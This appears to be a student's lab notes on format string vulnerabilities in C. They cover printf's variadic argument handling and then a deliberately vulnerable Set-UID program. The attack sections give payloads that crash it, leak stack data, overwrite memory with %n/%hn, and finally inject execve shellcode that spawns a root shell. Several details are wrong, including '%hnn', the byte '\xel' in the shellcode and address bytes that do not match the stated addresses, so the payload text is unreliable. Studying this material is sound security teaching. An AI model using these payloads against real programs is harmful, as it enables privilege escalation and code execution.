# Format String Vulnerability


### Function with Variable Number of Arguments
an example is the C _printf()_ function, which can accepts any number of arguments.
```c
#include <stdio.h>
int main() {
    int i = 1, j = 2, k = 3; 
    printf("print 3 numbers: %d, %d, %d\n", i,j,k);
}
```
This is because printf is defined as:
```c
int printf(const char *format, ...); 
```
the (...) in the argument indicates zero or more optional arguments can be provided when function is invoked. The optional arguments in C are accessible via the __stdarg__ macros defined in _stdarg.h_ header file. 
```c
#include <stdio.h>
#include <stdarg.h>

int print2(int Narg, ...) {
    int i;
    va_list ap;
    va_start(ap, Narg);
    for (i = 0; i < Narg; i++) {
        printf("%d ", va_arg(ap, int));
        printf("%f\n", va_arg(ap, double));
    }
    va_end(ap);
}
int main() {
    print2(1, 2, 3.5);
    print2(2, 2, 3.5, 3, 4.5);
    return 1; 
}
```
When print2 is called, the function arguments are passed on the stack (from higher address to lower) in the sequence of 4.5, 3, 3.5, 2, 2; the ```va_list``` list is used to access the arguments. It has length defined by Narg, and access in the __'reverse' order__, from 2 to 4.5. ```va_start()``` macro gets address of Narg, calculates its size based on type, and then sets value of ```va_list``` to address + size. So in this example ``va_list`` starts 4 bytes above Narg. <br>
`va_list` movement is determined by the `va_arg(ap, <type>)` macro. the `<type>` is used to determine how many bytes to move: if it is int type, move 4 bytes above, if double, move 8 bytes, etc. 

The `printf` function gets the list of argument in similar manner, the difference is that it uses explicit `type` option defined by the user. For example, `printf("print 3 numbers: %d, %d, %f\n", i,j,k)` already specified that there are two int type arguments and one float type following. If the input format string has type `%s`, which refers to string, the argument will be a pointer to the string object. <br>
The Program only cares about the advancement of the `va_list` specified in the format string, and when an input is missing, it still advances and prints the data in the memory location specified by the offset (even when it is not in the current stack frame). 

```c
#include <stdio.h>
int main()
{
    int id =100, age=25; char *name = "Bob";
    printf("ID: %d, Name: %s, Age:%d\n", id, name);
}
```
This program's printf misses one argument for the `Age`, which should be an int. The printf function will then access 4 bytes above the `va_list`, even though it is undefined in the current stack frame.
* The Compiler will generate a warning for this case, but it will still compile. 
This fact leaves room for exploit: user can inject any input into the program's memory space, thus potentially trigger arbitrary code execution, and privilege escalation. The following three cases are examples where users can input arbitrary strings into the program.
* `printf(user_input);`
* `sprintf(format, "%s %s", user_input, ": %d");
  printf(format, program_data);`
* `sprintf(format, "%s %s", getenv("PWD"), ": %d" );
  printf(format, program_data);`

### Experiment Setup 
```c
#include <stdio.h>

void fmtstr() {
    char input[100];
    int var = 0x11223344;
    
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var); 
    printf("enter a string: "); 
    fgets(input, sizeof(input)-1, stdin);
    printf(input); //vulnerable 
    printf("Data at target address: 0x%x\n", var);
}

void main() { fmtstr(); }
```

Stack layout for the program is as follows:
![fstack1](./image_files/fstack1.png)

We will compile and set it as Set-UID program: 
```
gcc -o vul vul.c
sudo chown root vul
sudo chmod 4755 vul 
sudo sysctl -w kernel.randomize_va_space=0 
```

### Attacks 

#### Attack 1: Crash the Program 
Will numerous number of parameters for format string, `va_list` can step into fmtstr()'s stack frame and access invalid address. Sample input is simply: `%s%s%s%s%s%s%s%s%s`, which could trigger a segfault. 

#### Attack 2: Print out Data on Stack 
One can print anything with the formatted input `%x`, which tells the program to print any integer values at the target memory address.

#### Attack 3: Change Program Data in Memory
![fstack2](./image_files/fstack2.png)
* __The %n option__: 
    when `printf("hello%n, %i)` is used, it will store integer 5 to the provided memory address, which is the address of variable i. In general, when printf() sees %n, it gets a value pointed to by the `va_list` pointer, and write to the memory provided. 
* __Insert Input into a File__: 
    The address, for example, could be obtained via gdb, say it is 0xBFFFF304. We need to input this address as the input for the format string. Suppose we know that the offset from the target value to the address of input string takes five %x formatted inputs. 
```
echo $(printf "\x04\x0F3\xFF\xBF").%x.%x.%x.%x.%x.%x.%n >input
```
The address is in little endian format, and treated as a command. The first part of the input ends up being the address we want. Since we need the condition that __When %n is used, the `va_list` directly points at the target memory address__, we used five %x.


```
vuln < input 
```
will trigger the attack, and the target memory (Variable) will be rewritten with the quantity equivalent to the number of bytes printed before the printf() sees %n. 

#### Attack 4: Change Program Data to Specific Value 
One can use the _precision modifier_ and _width modifier_ to modify the number of already printed value and modify %n. However this is not very efficient. <br>
* %n : treat the argument as a 4 byte integer.
* %hn: treat the argument as a 2 byte short, overwrites 2 least significant bytes of the argument.
* %hnn: treat the argument as a 1 byte char, overwrites the least significant byte.
Our goal is to rewrite the variable stored at memory location 0xBFFFF304, which is initially 0x11223344, to 0x66887799. We can modify the memory 2 bytes at a time: breaking the original data into two parts: 
* the first part is a 2 byte short with address 0xBFFFF304
* the second part is a 2 byte short with address 0xBFFFF306 

```c 
"\x06\xf3\xff\xbf@@@@\x04\xf3\xff\xbf_%x_%x_%x_%x_%x\%hn_%x%hn"
```
is placed at beginning of the format string, and the two addresses are stored. There is an exatra %x between the two %hn, since we have additional 4 bytes @@@@ in between. <br>
* Then, we need to modify the value with number we specify: with precision modifiers. To use _%.8x for the first 4 %x, when we arrive at the first %hn, 12 + 5 + 40 = 49 characters have been printed. To each 0x6688, or 26248, we need 26199 more characters, therefore the last %x has precision set to 26199. <br>
* Then, we need to modify the second address, which should be modified to value 0x7799. This is why we put @@@@ in between, so we can insert a 4 byte precision value. The difference between 0x7799 and 0x6688 is 4369, so we take 4368 as the precision, since we have one '_' before. This makes total printed character number as 0x6688 + 4369 = 0x7799. So when we reach the second %hn, value 0x7799 will be wrote to the memory address. The resulting string should be: 
```
echo $(printf "\x06\xf3\xff\xbf@@@@\x04\xf3\xff\xbf")
     _%.8x_%.8x_%.8x_%.8x_%.26199x%hn_%.4368x%hn > input 
```
The following image specifies the process. 
![fstring](./image_files/fstring.png)

#### Attack 5: Code Injection (Finally, shellcode)

Four challenges:
* Code Injection to stack
* Find the starting address of the injected code
* Find where the return address is stored (Say it is B)
* Write the value A to the memory B
The first three challenges can be achieved using gdb debugger and experimentation. We can append shellcode at the end of the format string. Suppose that we found the return address is 0xBFFFF38C, and the entry code for injected shellcode is 0xBFFFF358. So we need to write the value 0xBFFF358 to address 0xBFFFF38C. <br>
With the same technique, we break the data into two %hn chunks, one starting at 0xBFFFF38C and one at 0xBFFFF38E. We write 0xBFFF to first address and 0xF358 to the second address. <br>
The following input is thus written as: 
```
echo $(printf "\x8e\x3f\xff\xbf@@@@\x8c\x3f\xff\xbf")
     _%.8x_%.8x_%.8x_%.8x_%.49102x%hn_%.13144x%.hn
     $(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
       \x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xel\x99\xb0\x0b\xcd\x80") > input 
```

If we run the input as above, we do not get a stable shell, because the stdin is set from the input file. The workaround is to write a separate shell script to redirect the stdin as the terminal: 
```
echo $(printf "\x8e\x3f\xff\xbf@@@@\x8c\x3f\xff\xbf")
     _%.8x_%.8x_%.8x_%.8x_%.49102x%hn_%.13144x%.hn
     $(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
       \x31\xc0\x50\x68/tmp\x68/bad\x89\xe3\x50\x53\x89\xel\x99\xb0\x0b\xcd\x80") > input 
```
here, a shell script is written as '\tmp\bad', in which we have:
```
#!/bin/sh
/bin/sh 0 < &1 
```
which invokes a shell and uses the terminal as the standard input (terminal is represented as the standard output device &1)